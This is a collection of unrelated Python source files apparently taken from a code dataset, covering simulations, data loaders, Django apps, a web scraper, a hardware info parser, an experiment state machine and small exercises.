GSB['Team_at_Bat'] = Team[0] # else put HOME at bat
GSB['Inning'] += 1 # and increase inning....
def Batter_Up():
if GSB['Bat_Team_Status']['Outs'] < 3:
GSB['Bat_Team_Status']['Batter_Up'] = dict(Strikes=0, Balls=0)
else:
Team_Up()
# NOW, HERE ARE THE 11 "PITCH FUNCTIONS":
def Double():
GSB['Bat_Team_Status']['Bases'].insert(0,1)
GSB['Bat_Team_Status']['Bases'].insert(0,0)
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
Batter_Up()
def Single():
GSB['Bat_Team_Status']['Bases'].insert(0,1)
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
Batter_Up()
def BOE():
if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
GSB['Bat_Team_Status']['Bases'].insert(0,1)
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
if GSB['Bat_Team_Status']['Bases'] == [1,0,1]:
GSB['Bat_Team_Status']['Bases']= [1,1,1]
if GSB['Bat_Team_Status']['Bases'][0] == 0:
GSB['Bat_Team_Status']['Bases'][0] = 1
Batter_Up()
# In "base on balls" the batter goes to first. The other players advance to
# the next base, only if they have to (another player is coming for their base).
def BOB():
if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
GSB['Bat_Team_Status']['Bases'].insert(0,1)
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
if GSB['Bat_Team_Status']['Bases'] == [1,0,1]:
GSB['Bat_Team_Status']['Bases']= [1,1,1]
if GSB['Bat_Team_Status']['Bases'][0] == 0:
GSB['Bat_Team_Status']['Bases'][0] = 1
Batter_Up()
def Strike():
GSB['Bat_Team_Status']['Batter_Up']['Strikes'] += 1
if GSB['Bat_Team_Status']['Batter_Up']['Strikes'] == 3: # 3 strikes, you're out!
GSB['Bat_Team_Status']['Outs'] += 1
Batter_Up()
# In foul out, no player on base advances.
def Foul_Out():
GSB['Bat_Team_Status']['Outs'] += 1
Batter_Up()
# Out at first presumes that the other players advance a base. It also presumes that
# the defense would out the man on third before outing the hitter, if only it could!
# If the bases are loaded, then the man at third gets to home.
# The base states of [0,1,0], [0,0,1],[0,1,1] remain unchanged.
def Out_at_First():
GSB['Bat_Team_Status']['Outs'] += 1
if GSB['Bat_Team_Status']['Outs'] < 3:
if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
GSB['Bat_Team_Status']['Bases'].insert(0,0)
# Man on 3rd can score, if bases loaded.
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
if GSB['Bat_Team_Status']['Bases'] in [[1,0,1]]:
GSB['Bat_Team_Status']['Bases'] = [0,1,1] # Man on 3rd dares not try!
Batter_Up()
# In Fly_Out, each player on base advances, provided it is not the 3rd out.
def Fly_Out():
GSB['Bat_Team_Status']['Outs'] += 1
if GSB['Bat_Team_Status']['Outs'] < 3:
GSB['Bat_Team_Status']['Bases'].insert(0,0)
# runner on 3rd base scores!
GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
Batter_Up()
def Double_Play():
GSB['Bat_Team_Status']['Outs'] += 1 # Assume batter is out
MenOnBase = GSB['Bat_Team_Status']['Bases'].count(1) # Can out 1 more, if available!
if GSB['Bat_Team_Status']['Outs'] < 3 and MenOnBase > 0:
GSB['Bat_Team_Status']['Bases'].remove(1)
GSB['Bat_Team_Status']['Bases'].insert(0,0)
GSB['Bat_Team_Status']['Outs'] += 1
MenOnBase -= 1
Batter_Up()
def Triple_Play():
GSB['Bat_Team_Status']['Outs'] += 1 # Assume batter is out
MenOnBase = GSB['Bat_Team_Status']['Bases'].count(1) # Can only out 2 more, if available!
while GSB['Bat_Team_Status']['Outs'] < 3 and MenOnBase > 0:
GSB['Bat_Team_Status']['Bases'].remove(1)
GSB['Bat_Team_Status']['Bases'].insert(0,0)
GSB['Bat_Team_Status']['Outs'] += 1
MenOnBase -= 1
Batter_Up()
def Home_Run():
GSB['Score'][GSB['Team_at_Bat']] += 1 + sum(GSB['Bat_Team_Status']['Bases'])
GSB['Bat_Team_Status']['Bases'] = [0,0,0] # Clear bases
Batter_Up()
def Pitch():
def RollEm():
Roll = randint(1,6), randint(1,6)
return (min(Roll),max(Roll))
Roll = RollEm()
if Roll == (1, 1):
Double()
if Roll in [(1, 2),(1, 3),(1, 4)]:
Single()
if Roll == (1, 5):
BOE()
if Roll == (1, 6):
BOB()
if Roll in [(2, 2),(2, 3),(2, 4),(2, 5)]:
Strike()
if Roll == (2, 6):
Foul_Out()
if Roll in [(3, 3),(3, 4),(3, 5),(3, 6)]:
Out_at_First()
if Roll in [(4, 4),(4, 5),(4, 6)]:
Fly_Out()
if Roll == (5, 5):
Double_Play()
if Roll == (5, 6):
Triple_Play()
if Roll == (6, 6):
Home_Run()
def Game():
InitializeGSB()
Num_of_Plays = 0
while not Game_Over():
Num_of_Plays += 1
Pitch()
return Num_of_Plays, GSB['Score']
def Stats( NumGames=100):
Plays_per_Game = []
Runs_per_Game = []
for n in range(1, NumGames+1):
game = Game()
Plays_per_Game.append( game[0])
Runs_per_Game.append( game[1]['HOME'] + game[1]['VISITOR'])
return Plays_per_Game, Runs_per_Game
def Run_Program():
Plays, Runs = Stats(1000) # games
SF = pd.DataFrame([Plays, Runs], index=['Plays','Runs'])
SF = SF.T
print(f'Stats for {Games!r} games:')
print(SF.describe().iloc[1:].round(2))
SF.hist(column='Plays', grid=True, color='r', rwidth=0.9)
SF.hist(column='Runs', grid=True, color='g', rwidth=0.9)
return SF
if __name__ == '__main__':
Run_Program()
|
15,756 | 903620a14c67e6a7474b2fc439542bb921c099c1 | import numpy as np
import pandas as pd
import nibabel as nib
import pkg_resources
data_path = pkg_resources.resource_filename('trackingtools', 'data/')
def read_csv(fn):
'''
Convenience function to read a csv file into a Pandas dataframe.
Parameters
__________
fn : str
Filename for the csv file
Returns
_______
df : pd.DataFrame
Pandas dataframe
Example
_______
>> df = read_csv(fn='dmri_results.csv')
'''
df = pd.read_csv(fn)
return df
def get_projection(ID, trimmed=False, both=False, data_only=True):
img = nib.load(
data_path + f'allen/projection_densities/I{ID}_density.nii.gz')
projection_density = img.get_data()
if trimmed:
timg = nib.load(data_path + f'allen/truth_masks/I{ID}_truth.nii.gz')
mask = timg.get_data()
trimmed = np.zeros_like(projection_density)
trimmed[mask == 1] = projection_density[mask == 1]
if both:
if data_only:
return projection_density, trimmed
else:
img, projection_density, trimmed
else:
if data_only:
return trimmed
else:
img, trimmed
else:
if data_only:
return projection_density
else:
return img, projection_density
def get_brain_mask():
img = nib.load(data_path + 'allen/brain_mask.nii.gz')
data = img.get_data()
return data
|
15,757 | 38f3a17bb524068debe27e9c76d333b5879ae478 | from django.db import models
# Create your models here.
class EmailValidation(models.Model):
class Meta:
pass
email_pk = models.AutoField(primary_key=True)
# user_name = models.CharField(max_length=50)
request_email = models.CharField(max_length=50, null=False)
class NoteCertificateValidation(models.Model):
class Meta:
pass
lcs_kind = models.CharField(max_length=10, default='0')
hangul_name = models.CharField(max_length=50, null=False)
dob = models.CharField(max_length=6)
lcs_num = models.CharField(max_length=12)
issue_dob = models.CharField(max_length=8)
lcs_mng_num = models.CharField(max_length=10)
class CertCertificateValidation(models.Model):
class Meta:
pass
lcs_kind = models.CharField(max_length=10, default='1')
hangul_name = models.CharField(max_length=50, null=False)
lcs_mng_num1 = models.CharField(max_length=8)
lcs_mng_num2 = models.CharField(max_length=4) |
15,758 | d8fb84258c1dcf5c1be339f60a06b3e8723d7ef8 | def get_collatz_length(n):
result = []
# optimized algorithm for collatz length
# still pretty slow, longest_collatz(1000000) take over 40s
while n != 1:
# handle odd elements in the sequence
if n % 2:
if n % 4 == 1:
# 3n + 1 is part of the 4n + 1 sequence
n = 3 * ((n - 1) / 4) + 1
else:
# if n is odd, 3n + 1 will always be even, thus divide by 2
n = (3 * n + 1) / 2
# handle even elements in the sequence
else:
if n % 4:
# apply ordinary algorithm for even numbers not divisible by 4
n /= 2
else:
# dividing by 4 let us skip at least 1 step in the worst case
n /= 4
# add n to the sequence
result.append(n)
return len(result)
def longest_collatz(upper_bound):
assert type(upper_bound) == int and upper_bound > 0
longest = None
# get the integer in (1 ... upper_bound) which generates the longest collatz chain
for x in range(1, upper_bound + 1):
collatz_length = get_collatz_length(x)
if collatz_length > longest:
longest = x
return longest
print longest_collatz(1000000)
|
15,759 | 0a7b3b6400065216159b0607d194618dff17ac4f | '''
Account wizard.
'''
import wx
from gui.pref import pg_accounts
from gui import skin
from gui.native.win.winutil import is_vista
import traceback
import util.primitives.funcs as utilfuncs
def show():
if not AccountWizard.RaiseExisting():
w = AccountWizard()
w.CenterOnScreen()
w.Show()
def bind_paint(ctrl, paint):
def on_paint(e):
dc = wx.AutoBufferedPaintDC(ctrl)
return paint(dc)
ctrl.Bind(wx.EVT_PAINT, on_paint)
class AccountWizard(wx.Frame):
MIN_SIZE = (567, 569)
def __init__(self, parent=None):
wx.Frame.__init__(self, parent, -1,
title=_('Digsby Setup Wizard'))
self.SetFrameIcon(skin.get('AppDefaults.TaskbarIcon'))
self.Bind(wx.EVT_CLOSE, self.on_close)
big_panel = wx.Panel(self)
# header
header = wx.Panel(big_panel)
header.SetBackgroundColour(wx.Colour(244, 249, 251))
hdr1 = wx.StaticText(header, -1, _('Welcome to Digsby!'))
set_font(hdr1, 18, True)
elems = \
[(False, 'All your '),
(True, 'IM'),
(False, ', '),
(True, 'Email'),
(False, ' and '),
(True, 'Social Network'),
(False, ' accounts under one roof.')]
txts = []
for emphasis, text in elems:
txt = wx.StaticText(header, -1, text)
set_font(txt, 12, bold=emphasis, underline=False)
txts.append(txt)
txt_sizer = wx.BoxSizer(wx.HORIZONTAL)
txt_sizer.AddMany(txts)
icon = skin.get('AppDefaults.TaskBarIcon').PIL.Resized(48).WXB
bind_paint(header, lambda dc: dc.DrawBitmap(icon, 5, 3, True))
icon_pad = icon.Width + 6
header.Sizer = sz = wx.BoxSizer(wx.VERTICAL)
sz.AddMany([(hdr1, 0, wx.EXPAND | wx.LEFT, 6 + icon_pad),
(3, 3),
(txt_sizer, 0, wx.EXPAND | wx.LEFT, 6 + icon_pad)])
# accounts panel
panel = wx.Panel(big_panel)
panel.BackgroundColour = wx.WHITE
panel.Sizer = sizer = wx.BoxSizer(wx.VERTICAL)
self.exithooks = utilfuncs.Delegate()
pg_accounts.panel(panel, sizer, None, self.exithooks)
# paint the background + line
def paint(e):
dc = wx.AutoBufferedPaintDC(big_panel)
dc.Brush = wx.WHITE_BRUSH
dc.Pen = wx.TRANSPARENT_PEN
r = big_panel.ClientRect
dc.DrawRectangleRect(r)
dc.Brush = wx.Brush(header.BackgroundColour)
y = header.Size.height + 19
dc.DrawRectangle(0, 0, r.width, y)
dc.Brush = wx.Brush(wx.BLACK)
dc.DrawRectangle(0, y, r.width, 1)
big_panel.BackgroundStyle = wx.BG_STYLE_CUSTOM
big_panel.Bind(wx.EVT_PAINT, paint)
# Done button
# button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# button_sizer.AddStretchSpacer(1)
# done = wx.Button(panel, -1, _('&Done'))
# done.Bind(wx.EVT_BUTTON, lambda e: self.Close())
# button_sizer.Add(done, 0, wx.EXPAND)
# sizer.Add(button_sizer, 0, wx.EXPAND | wx.TOP, 10)
big_panel.Sizer = sz = wx.BoxSizer(wx.VERTICAL)
sz.Add(header, 0, wx.EXPAND | wx.ALL, 8)
sz.Add((5, 5))
sz.Add(panel, 1, wx.EXPAND | wx.ALL, 12)
self.SetMinSize(self.MIN_SIZE)
self.SetSize(self.MIN_SIZE)
def on_close(self, e):
def show_hint():
icons = wx.GetApp().buddy_frame.buddyListPanel.tray_icons
if icons:
icon = icons[0][1]
icon.ShowBalloon(_('Quick Access to Newsfeeds'),
_('\nYou can access social network and email newsfeeds'
' by clicking their icons in the tray.\n'
'\nDouble click to update your status (social networks)'
' or launch your inbox (email accounts).\n'
' \n'), 0, wx.ICON_INFORMATION)
wx.CallLater(300, show_hint)
if getattr(self, 'exithooks', None) is not None:
self.exithooks()
e.Skip(True)
def set_font(ctrl, size, bold=False, underline=False):
f = ctrl.Font
if is_vista(): f.SetFaceName('Segoe UI')
f.PointSize = size
if bold: f.Weight = wx.FONTWEIGHT_BOLD
if underline: f.SetUnderlined(True)
ctrl.Font = f
|
15,760 | c2286351615e24986d4f90c2f068fee3515abee0 | from celery_tasks.main import celery_app
from celery_tasks.yuntongxun.ccp_sms import CCP
@celery_app.task(name='send_sms_verify_code')
def send_sms_verify_code(mobile, sms_code):
'''在celery中实现短信的异步发送功能'''
result = CCP().send_template_sms(mobile, [sms_code, 5], 1)
print(result)
return result |
15,761 | 26713acc718504ea87c5ff9adcfbfed45187e288 | """
Project Euler, problem 40
An irrational decimal fraction is created by concatenating the positive
integers: 0.12345678910'1'112131415161718192021...
It can be seen that the 12th digit of the fractional part is 1.
If dn represents the nth digit of the fractional part, find the value of
the following expression.
d1 × d10 × d100 × d1000 × d10000 × d100000 × d1000000
answer = 210 # correct
"""
num = 0
answer = 1
for i in range(1000001):
power = int(len(str(i)))
for j in range(len(str(i))):
if num == 10 ** power - j:
answer *= int(str(i)[j])
num += power
print("answer: ", answer)
|
15,762 | 5620b3815ceda98484270c2f7f1f30cc27ec9189 | from sysassert.datasource import DataSource
from sysassert.cmd import rawcmd
from sysassert.tools import normalize
class DMIDataSource(DataSource):
dmi_types = {
0: 'bios',
1: 'system',
2: 'base board',
3: 'chassis',
4: 'processor',
5: 'memory controller',
6: 'memory module',
7: 'cache',
8: 'port connector',
9: 'system slots',
10: 'on board devices',
11: 'oem strings',
12: 'system configuration options',
13: 'bios language',
14: 'group associations',
15: 'system event log',
16: 'physical memory array',
17: 'memory device',
18: '32-bit memory error',
19: 'memory array mapped address',
20: 'memory device mapped address',
21: 'built-in pointing device',
22: 'portable battery',
23: 'system reset',
24: 'hardware security',
25: 'system power controls',
26: 'voltage probe',
27: 'cooling device',
28: 'temperature probe',
29: 'electrical current probe',
30: 'out-of-band remote access',
31: 'boot integrity services',
32: 'system boot',
33: '64-bit memory error',
34: 'management device',
35: 'management device component',
36: 'management device threshold data',
37: 'memory channel',
38: 'ipmi device',
39: 'power supply',
40: 'additional information',
41: 'onboard device'
}
command = ['dmidecode']
def __init__(self, dmidata=None):
if dmidata is not None:
self.dmidata = dmidata
else:
dmidata = rawcmd(self.command)
self.data = self._parse_dmi(dmidata)
def dmi_id(self, dmi_type):
"""
Finds a dmi id from the dmi type name
Returns a dmi id or raises KeyError
"""
if dmi_type not in self.dmi_types.values():
raise KeyError(_('unknown dmi type'))
return [item[0]
for item in self.dmi_types.items()
if item[1] == dmi_type][0]
@classmethod
def get_deps(cls):
return [cls.command[0]]
def get_items(self, dmi_type=None):
"""
Returns dmi items matching an optional dmi id
"""
if dmi_type is None:
return [elt[1] for elt in self.data]
dmi_id = self.dmi_id(dmi_type)
return [elt[1] for elt in self.data if elt[0] == dmi_id]
def _parse_dmi(self, content):
"""
Parse the whole dmidecode output.
Returns a list of tuples of (type int, value dict).
"""
info = []
lines = iter(content.strip().splitlines())
while True:
try:
line = next(lines)
except StopIteration:
break
if line.startswith('Handle 0x'):
typ = int(line.split(',', 2)[1].strip()[len('DMI type'):])
if typ in self.dmi_types:
info.append((typ, self._parse_handle_section(lines)))
return info
@staticmethod
def _parse_handle_section(lines):
"""
Parse a section of dmidecode output
* 1st line contains address, type and size
* 2nd line is title
* line started with one tab is one option and its value
* line started with two tabs is a member of list
"""
data = {}
key = ''
next(lines)
for line in lines:
line = line.rstrip()
if line.startswith('\t\t'):
if isinstance(data[key], list):
data[key].append(line.lstrip())
elif line.startswith('\t'):
key, value = [i.strip() for i in line.lstrip().split(':', 1)]
key = normalize(key)
if value:
data[key] = value
else:
data[key] = []
else:
break
return data
|
15,763 | 6cc3bf52a0ee1608a7a04d65be9e0c2f379df4d7 | #!/Users/zhenghongwang/.pyenv/shims/python3
from typing import *
import os
import time
import urllib.request
import json
import hashlib
from fetch_audio import fetch_audio
raw_data_file_path = 'raw_data.json'
mod_data = []
# read audio file in local
audio_files = os.listdir('audio')
def calc_md5(path):
with open(path, 'rb') as f:
file_hash = hashlib.md5()
chunk = f.read(8192)
while chunk:
file_hash.update(chunk)
chunk = f.read(8192)
return file_hash.hexdigest()
def fetch_audio_file(text, checker, li):
fetch_audio(text)
checker.append(text)
audio_file_local_path = "audio/%s.mp3" % text
new_entry = {
"text": text,
"path": audio_file_local_path,
"md5": calc_md5(audio_file_local_path),
"size": os.stat(audio_file_local_path).st_size,
"audio_url": "https://zh-wang.github.io/right_brain_training_data/%s" % audio_file_local_path
}
li.append(new_entry)
with open(raw_data_file_path, 'r') as json_file:
data = json.load(json_file)
# read audio files
audio_already_exists = []
for audio_entry in data['audio_data']:
audio_already_exists.append(audio_entry['text'])
# prepare image files
for img_entry in data['img_data']:
local_path = img_entry['local_path']
if not img_entry['md5']:
img_entry['md5'] = calc_md5(local_path)
if not img_entry['size']:
img_entry['size'] = os.stat(local_path).st_size
if not img_entry['img_url']:
img_entry['img_url'] = "https://zh-wang.github.io/right_brain_training_data/%s" % local_path
# prepare audio file for 'name_ja'
if img_entry['name_ja'] not in audio_already_exists:
fetch_audio_file(img_entry['name_ja'], audio_already_exists, data['audio_data'])
mod_data = data
with open(raw_data_file_path, 'w') as json_file:
json_file.write(json.dumps(mod_data, ensure_ascii=False, indent=4))
|
15,764 | 660d61cc95271f4920c275663d04d9574d5472da | from itertools import zip_longest
import json
import scrapy
import logging
from items.items import ProductTescoItem
array_test = lambda i:(None if len(i) == 0 else '\n'.join(i))
class TescoSpider(scrapy.Spider):
name = 'tesco'
allowed_domains = ['tesco.com']
start_urls = ['https://www.tesco.com/groceries/en-GB/shop/household/kitchen-roll-and-tissues/all?page=1',
'https://www.tesco.com/groceries/en-GB/shop/pets/cat-food-and-accessories/all?page=1'
]
count = 0
def product_data(self, response):
item = ProductTescoItem()
item['product_url'] = response.url
item['product_id'] = int(response.url.split('/')[-1])
item['image_url'] = response.xpath('//div[@class="product-image--clickable"]/div/img/@src').get()
item['product_title'] = response.xpath('//h1[@class="product-details-tile__title"]/text()').get()
item['category'] = \
response.xpath('//div/a/span[@class="styled__Text-sc-1xizymv-1 fGKZGz beans-link__text"]/text()').getall()[
-1]
item['price'] = float(response.xpath('//span[@data-auto="price-value"]/text()').getall()[0])
# a part of description
raw_product_description = response.xpath('//div[@id="product-marketing"]/ul/li/text()').getall() + \
response.xpath('//div[@id="product-description"]/ul/li/text()').getall() + \
response.xpath('//div[@id="features"]/ul/li/text()').getall() + \
response.xpath('//div[@id="other-information"]/ul/li/text()').getall()
item['product_description'] = array_test(raw_product_description)
item['name_and_address'] = array_test(response.xpath('//div[@id="manufacturer-address"]/ul/li/text()').getall())
item['return_address'] = array_test(response.xpath('//div[@id="return-address"]/ul/li/text()').getall())
item['net_contents'] = array_test(
response.xpath('//div[@id="net-contents"]/p/text()|//div[@id="pack-size"]/ul/li/text()').getall())
# a part of review
review = []
review_list_keys = ['review_title', 'stars_count', 'author', 'date', 'review_text']
review_title = response.xpath('//div[@id="review-data"]/article/section/h4/text()').getall()
stars_count = [int(i.split(' ')[0]) for i in
response.xpath('//div[@id="review-data"]/article/section/div/span/text()').getall()]
raw_author = response.xpath(
'//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[1]/span[1]/text()').getall()
date = response.xpath('//span[@class="submission-time"]/text()').getall()
author = [raw_author[i] if raw_author[i] != date[i] else None for i in range(len(raw_author))]
review_text = response.xpath(
'//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[2]/text()|//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[3]/text()').getall()
if len(review_text) == 0:
item['review'] = None
else:
for i in zip_longest(review_title, stars_count, author, date, review_text):
review.append(dict(zip((review_list_keys), i)))
item['review'] = json.dumps(review)
# a part of usually bought products
usually_bought_product_url = response.xpath('//div[@class="product-tile-wrapper"]/div/div/div/a/@href').getall()
usually_bought_product_title = response.xpath(
'//div[@class="product-tile-wrapper"]/div/div/div/div/div/h3/a/text()').getall()
if len(usually_bought_product_url) == 0 or len(usually_bought_product_title) == 0:
item['usually_bought_next_products'] = None
else:
usually_bought_next_products = []
usually_bought_products_keys = ['product_url', 'product_title']
for i in zip_longest(usually_bought_product_url, usually_bought_product_title):
usually_bought_next_products.append(dict(zip((usually_bought_products_keys), i)))
item['usually_bought_next_products'] = json.dumps(usually_bought_next_products)
logger = logging.getLogger()
logger.info('Parse function called on %s', response.url)
yield item
def parse(self, response):
NEXT_PAGE_SELECTOR = "//*[@name='go-to-results-page']/@href"
PRODUCT_ON_PAGE_SELECTOR = "//*[@data-auto='product-tile--title']/@href"
next_page = response.xpath(NEXT_PAGE_SELECTOR).get()
product_list_on_page = response.xpath(PRODUCT_ON_PAGE_SELECTOR).getall()
for product_link in product_list_on_page:
yield scrapy.Request(response.urljoin(product_link), callback=self.product_data)
if next_page:
yield scrapy.Request(response.urljoin(next_page), callback=self.parse)
|
15,765 | a946a585646de69ecd604e0e044b1d830b543b1f | from utils.Timer import *
from StateMachine import *
from datetime import datetime, timedelta
from Stimulus import *
import os
class State(StateClass):
def __init__(self, parent=None):
self.timer = Timer()
if parent:
self.__dict__.update(parent.__dict__)
def setup(self, logger, BehaviorClass, StimulusClass, session_params, conditions):
logger.log_session(session_params, 'Free')
# Initialize params & Behavior/Stimulus objects
self.logger = logger
self.beh = BehaviorClass(logger, session_params)
self.stim = StimulusClass(logger, session_params, conditions, self.beh)
self.params = session_params
exitState = Exit(self)
self.StateMachine = StateMachine(Prepare(self), exitState)
self.logger.log_conditions(conditions, ['RewardCond'])
self.logger.lock = False
# Initialize states
global states
states = {
'PreTrial' : PreTrial(self),
'Trial' : Trial(self),
'InterTrial' : InterTrial(self),
'Reward' : Reward(self),
'Sleep' : Sleep(self),
'OffTime' : OffTime(self),
'Exit' : exitState}
def entry(self): # updates stateMachine from Database entry - override for timing critical transitions
self.StateMachine.status = self.logger.get_setup_info('status')
self.logger.update_state(self.__class__.__name__)
def run(self):
self.StateMachine.run()
def is_sleep_time(self):
now = datetime.now()
t = datetime.strptime(self.params['start_time'], "%H:%M:%S")
start = now.replace(hour=0, minute=0, second=0) + timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
t = datetime.strptime(self.params['stop_time'], "%H:%M:%S")
stop = now.replace(hour=0, minute=0, second=0) + timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
if stop < start:
stop = stop + timedelta(days=1)
time_restriction = now < start or now > stop
return time_restriction
class Prepare(State):
def run(self):
self.stim.setup()
def next(self):
if self.is_sleep_time():
return states['Sleep']
else:
return states['PreTrial']
class PreTrial(State):
def entry(self):
self.stim.prepare()
self.beh.prepare(self.stim.curr_cond)
self.timer.start()
self.logger.update_state(self.__class__.__name__)
def run(self): pass
def next(self):
if self.beh.is_ready(self.stim.curr_cond['init_duration']):
return states['Trial']
elif self.is_sleep_time():
return states['Sleep']
else:
if self.timer.elapsed_time() > 5000: # occasionally get control status
self.timer.start()
self.StateMachine.status = self.logger.get_setup_info('status')
self.logger.ping()
return states['PreTrial']
class Trial(State):
def __init__(self, parent):
self.__dict__.update(parent.__dict__)
self.is_ready = 0
self.probe = 0
self.resp_ready = False
self.trial_start = 0
super().__init__()
def entry(self):
self.stim.unshow()
self.logger.update_state(self.__class__.__name__)
self.timer.start() # trial start counter
self.trial_start = self.logger.init_trial(self.stim.curr_cond['cond_hash'])
def run(self):
self.stim.present() # Start Stimulus
self.is_ready = self.beh.is_ready(self.timer.elapsed_time()) # update times
self.probe = self.beh.is_licking(self.trial_start)
if self.timer.elapsed_time() > self.stim.curr_cond['delay_duration'] and not self.resp_ready:
self.resp_ready = True
if self.probe > 0: self.beh.update_bias(self.probe)
def next(self):
if self.probe > 0 and self.resp_ready: # response to correct probe
return states['Reward']
elif self.timer.elapsed_time() > self.stim.curr_cond['trial_duration']: # timed out
return states['InterTrial']
else:
return states['Trial']
def exit(self):
self.logger.log_trial()
self.stim.unshow((0, 0, 0))
self.logger.ping()
class InterTrial(State):
def run(self):
pass
def next(self):
if self.is_sleep_time():
return states['Sleep']
elif self.beh.is_hydrated():
return states['OffTime']
elif self.timer.elapsed_time() > self.stim.curr_cond['intertrial_duration']:
return states['PreTrial']
else:
return states['InterTrial']
class Reward(State):
def run(self):
self.beh.reward()
self.stim.unshow([0, 0, 0])
def next(self):
return states['InterTrial']
class Sleep(State):
def entry(self):
self.logger.update_state(self.__class__.__name__)
self.logger.update_setup_status('sleeping')
self.stim.unshow([0, 0, 0])
def run(self):
self.logger.ping()
time.sleep(5)
def next(self):
if self.is_sleep_time() and self.logger.get_setup_info('status') == 'sleeping':
return states['Sleep']
elif self.logger.get_setup_info('status') == 'sleeping': # if wake up then update session
self.logger.update_setup_status('running')
return states['Exit']
else:
return states['PreTrial']
class OffTime(State):
def entry(self):
self.logger.update_state(self.__class__.__name__)
self.logger.update_setup_status('offtime')
self.stim.unshow([0, 0, 0])
def run(self):
self.logger.ping()
time.sleep(5)
def next(self):
if self.is_sleep_time():
return states['Sleep']
elif self.logger.get_setup_info('status') == 'stop': # if wake up then update session
return states['Exit']
else:
return states['OffTime']
class Exit(State):
def run(self):
self.beh.cleanup()
self.stim.close()
class Uniform(Stimulus):
""" This class handles the presentation of Movies with an optimized library for Raspberry pi"""
def setup(self):
# setup parameters
self.path = 'stimuli/' # default path to copy local stimuli
self.size = (800, 480) # window size
self.color = [127, 127, 127] # default background color
self.loc = (0, 0) # default starting location of stimulus surface
self.fps = 30 # default presentation framerate
self.phd_size = (50, 50) # default photodiode signal size in pixels
self.set_intensity(self.params['intensity'])
# setup pygame
pygame.init()
self.screen = pygame.display.set_mode(self.size)
self.unshow()
pygame.mouse.set_visible(0)
pygame.display.toggle_fullscreen()
def prepare(self):
self._get_new_cond()
def unshow(self, color=False):
"""update background color"""
if not color:
color = self.color
self.screen.fill(color)
self.flip()
def flip(self):
""" Main flip method"""
pygame.display.update()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
self.flip_count += 1
def close(self):
"""Close stuff"""
pygame.mouse.set_visible(1)
pygame.display.quit()
pygame.quit()
def set_intensity(self, intensity=None):
if intensity is None:
intensity = self.params['intensity']
cmd = 'echo %d > /sys/class/backlight/rpi_backlight/brightness' % intensity
os.system(cmd)
|
15,766 | e6514129fa4f9a4249e413d76e0f514540dd20da | """
Tested on python 3.9.7
"""
import unittest
from unittest.mock import patch
import io
from main import checkIsGraduated
class TestIsGraduatedOrNot(unittest.TestCase):
"""
Mocking stdout for assertion output and make custom decorator
"""
mock_stdout = patch('sys.stdout', new_callable=io.StringIO)
"""
Should be successfull with graduated
"""
@mock_stdout
@patch('builtins.input', side_effect=['test', '70'])
def test_is_not_graduted(self, _, mock_print):
checkIsGraduated()
self.assertEqual(mock_print.getvalue(), 'Nama: test\nNilai: 70\nKeterangan: Tidak lulus\n')
"""
Should be successfull with not graduated
"""
@mock_stdout
@patch('builtins.input', side_effect=['testing', '71'])
def test_is_graduted(self, _, mock_print):
checkIsGraduated()
self.assertEqual(mock_print.getvalue(), 'Nama: testing\nNilai: 71\nKeterangan: Lulus\n')
"""
Should raise ValueError when input alphabet or what else except integer
"""
@patch('builtins.input', side_effect=['test', 'test'])
def test_is_bad_int_with_alphabet(self, _):
with self.assertRaises(ValueError) as cm:
checkIsGraduated()
self.assertEqual(cm.exception.args[0], ('Bilangan test bukan integer'))
"""
Should raise ValueError when input float
"""
@patch('builtins.input', side_effect=['test', '80.5'])
def test_is_bad_int_with_float(self, _):
with self.assertRaises(ValueError) as cm:
checkIsGraduated()
self.assertEqual(cm.exception.args[0], ('Bilangan 80.5 bukan integer'))
if __name__ == '__main__':
unittest.main(verbosity=2) |
15,767 | 29a510119e519795caa742f1226154e558b72ad6 | print("Hello World!")
print("Hello Again")
print("I like typing this")
print("This is fun")
print("Yay! Printing.")
print("I'd much rather you 'not'.")
print('I "said" do not touch this.')
#run this code on terminal (SAVE before running)
#STUDY DRILLS
print("Another Line") #1
#2: print only one line (delete or comment out)
# this turns lines into comments - this code does not run
|
15,768 | 1f74548fb76cd973eb3ecaec8a889191b4f463e6 | from django.contrib import admin
from core.models import Entry, Member
from datetime import datetime
class EntryAdmin(admin.ModelAdmin):
list_display = ['uid', 'date', 'approved', 'member']
list_filter = ('date', 'approved', 'member')
actions = ['sign_up_as_member']
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
def sign_up_as_member(self, request, queryset):
for obj in queryset:
approved = obj.approved
print(approved)
if not approved:
uid = obj.uid
print(uid)
try:
member = Member.objects.get(uid=uid)
except:
member = Member(uid=uid)
member.save()
sign_up_as_member.short_description = "Sign up the selected UIDs as members."
class MemberAdmin(admin.ModelAdmin):
list_display = ['uid', 'join_date', 'name', 'student_id']
list_filter = ['join_date']
admin.site.register(Entry, EntryAdmin)
admin.site.register(Member, MemberAdmin)
|
15,769 | 2f6a309e54d356fa5b3238e0a3068ef749cf4af5 | # -*- coding: utf-8 -*-
from flask import Flask
from flask import render_template
#from flask.ext.twisted import Twisted
from flask_twisted import Twisted
app = Flask(__name__)
@app.route('/')
@app.route('/<name>')
def index(name=None):
print 'come into index'
return render_template('hello.html', name=name)
twisted = Twisted(app)
if __name__ == "__main__":
print 'come into main'
